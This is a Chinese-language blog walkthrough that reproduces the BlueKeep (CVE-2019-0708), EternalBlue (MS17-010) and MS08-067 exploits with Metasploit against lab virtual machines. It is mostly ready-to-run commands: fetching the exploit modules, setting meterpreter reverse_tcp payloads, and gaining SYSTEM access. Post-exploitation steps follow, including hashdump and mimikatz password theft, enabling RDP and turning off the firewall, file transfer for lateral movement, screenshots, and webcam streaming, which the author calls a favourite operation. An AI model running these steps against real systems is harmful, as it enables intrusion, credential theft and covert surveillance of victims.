CVE-2019-0708,MS17-010,MS08-067漏洞复现

虽然网上都一大堆了,有些自己踩过的还是要记录一下,毕竟有用

CVE-2019-0708 (BlueKeep)

远程桌面服务(以前称为终端服务)中存在远程执行代码漏洞,当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击。

漏洞环境

由于现阶段的exp只能在win7 sp1版本和win 2008 R2版本起作用,这里选择win7 sp1 ,经本人测试,该exp利用成功率不太高,经常性 no session was created,建议利用一次建议试一次重启靶机一次,提高成功率。

攻击机:kali IP:192.168.70.152(注意metasploit最好更新到5.x以上版本不然可能会出错)
靶机: win7 IP:192.168.70.153(开放3389端口,关闭防火墙)

工具准备

现阶段exp还没有并入msf中,需要自己下载导入一下

1
2
3
4
5
6
7
8
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

复现过程

扫一下目标主机确认其开放3389端口

ntV61J.png

进入msf后使用reload_all重新加载0708rdp利用模块,

ntn656.png

使用命令search 0708 查找相关模块,第一个和第四个分别是扫描和利用的模块

ntu9I0.png

可以先使用第一个模块去扫描靶机是否存在当前漏洞,使用info查询我们需要配置的内容,这里我们需要配置远程ip地址rhosts属性即可,默认3389端口,不需要修改

ntuQJK.png

set rhosts 192.168.70.153之后就可以愉快地run了,可以发现存在该漏洞

ntu2oq.png之后换另外一个利用的模块,use exploit/windows/rdp/cve_2019_0708_bluekeep_rce,同样可以先使用info查看需要配置的相关属性,除了跟刚才一样的设置ip的属性,还要注意这个模块存在这样的一个target属性,这是一个坑点,这里规定了靶机的架构,这里我是在虚拟机里面完成的所以选择3,命令就是set target 3

ntKRnH.png

如果直接默认会怎样,可能就会如下图:),蓝屏警告23333。。

ntM4r4.png

设置好rhosts为192.168.70.153之后run一发,可以看到权限直接是system权限了,为所欲为了。

nN9PsK.png

MS17-010(永恒之蓝)

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

漏洞环境

攻击机:kali IP: 192.168.70.152
靶机: win7 IP: 192.168.70.153(开放445端口,关闭防火墙)

复现过程

先使用nmap扫描一波主机的端口存活性,nmap -sS -p 445 192.168.70.153

nNCDjP.png

使用命令msfconsole进入msf,然后search ms17-010查找对应的模块,可以看到里面存在对应的扫描模块以及利用模块

nNCbEF.png

然后这里我使用第二个模块去探测主机是否存在该漏洞,use auxiliary/scanner/smb/smb_ms17_010,然后使用info命令查看我们所需要配置的一些信息,这里我们需要配置的也是一个rhosts,因为他的required也是yes,是必须的,其他的端口号啥的使用默认的445,必要时候我们也是需要改变端口号的

nNPF4H.png

然后set rhosts 192.168.70.153 之后执行 run命令,发现疑似存在该漏洞

nNPtK0.png

然后下面就开始使用攻击模块了,这次除了设置一下lhost,rhost之外,我们还可以设置一下payload属性,使用一些msf自带的一些反弹shell的模块,更多功能XD,详细的话我们可以直接使用show payloads命令去查看

nN8Ai9.png

1
2
3
4
set lhost 192.168.70.152   #设定攻击机
set rhost 192.168.70.153 #设定靶机
set payload windows/x64/meterpreter/reverse_tcp
run #运行

功能成功,可以使用msf中reverse_tcp里面的一些命令了

nNGM60.png

1
2
3
4
5
6
7
getuid	#查看当前权限
sysinfo #查看靶机信息
shell #获取shell
chcp 65001 #shell中文识别
hashdump #好像只有管理员才能用
pwd #查看当前目录
ps #查看进程信息

emmm,有点无脑,也是直接获得system权限的

nNGYtJ.png

主要在这个payload模块下还有其他好玩的东西

获取用户密码

这个好像是只能获取当前登录的用户的用户名密码,不然的话好像加载不出来密码的

1
2
load mimikatz		#载入mimikatz
wdigest

nNGq9s.png

开启远程桌面

可以开启3389端口并且顺便关掉防火墙2333

1
run post/windows/manage/enable_rdp

Linux下连接rdp,先记着,怕忘了

1
rdesktop 192.168.70.153 -u user -p passw0rd
上传/下载文件

这个一般在有内网的时候比较好用,上传个代理,扫描器啥的,可以进行内网渗透

1
2
download /
upload /file
截屏
1
meterpreter > screenshot
开启摄像头

个人最喜欢这个操作XD,不解释。

1
meterpreter > webcam_stream

nNYZzn.png

MS-08067

攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call 远程过程调用)请求,造成了栈缓冲区内存错误,造成可被利用实施远程代码执行。影响范围:Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本

漏洞环境

攻击机:kali IP: 192.168.70.152
靶机: win xp sp2 IP: 192.168.70.155(关闭防火墙)

复现过程

根据漏洞描述就是说也是需要打开445端口的,所以我们先来确认一下445端口是否开启

nUma7R.png

然后msfconsole进入msf,然后search 08-067查找相关模块,use那个模块即可,使用info查看相关的信息

nN6rHH.png

然后我们就可以设置rhost,payload,lhost

1
2
3
set rhost 192.168.70.155
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.70.152

nUns5q.png

这里面的target属性我们设置为5,选择xp sp2的英文版,如果没选对很可能出现下面的情况

nUmycD.png

run之后可以发现同样是system权限又可以为所欲为了XD

nUnOMD.png

总结

1.有些坑点还是需要注意一下,关于set target的问题,最好还是自己手动设置一下吧,不然直接使用默认的target会可能出现各种各样的问题,毕竟这些架构问题不是我这个水平搞得定的,我太菜了:)

2.msf常用的就那几个命令,熟练就好了,可能还有其他骚操作,以后遇到再学吧,但是听说在内网渗透的时候不太用,流量太大了。


听说,打赏我的人最后都成了大佬。



文章目录
  1. 1. CVE-2019-0708 (BlueKeep)
    1. 1.1. 漏洞环境
    2. 1.2. 工具准备
    3. 1.3. 复现过程
  2. 2. MS17-010(永恒之蓝)
    1. 2.1. 漏洞环境
    2. 2.2. 复现过程
      1. 2.2.1. 获取用户密码
      2. 2.2.2. 开启远程桌面
      3. 2.2.3. 上传/下载文件
      4. 2.2.4. 截屏
      5. 2.2.5. 开启摄像头
  3. 3. MS-08067
    1. 3.1. 漏洞环境
    2. 3.2. 复现过程
  4. 4. 总结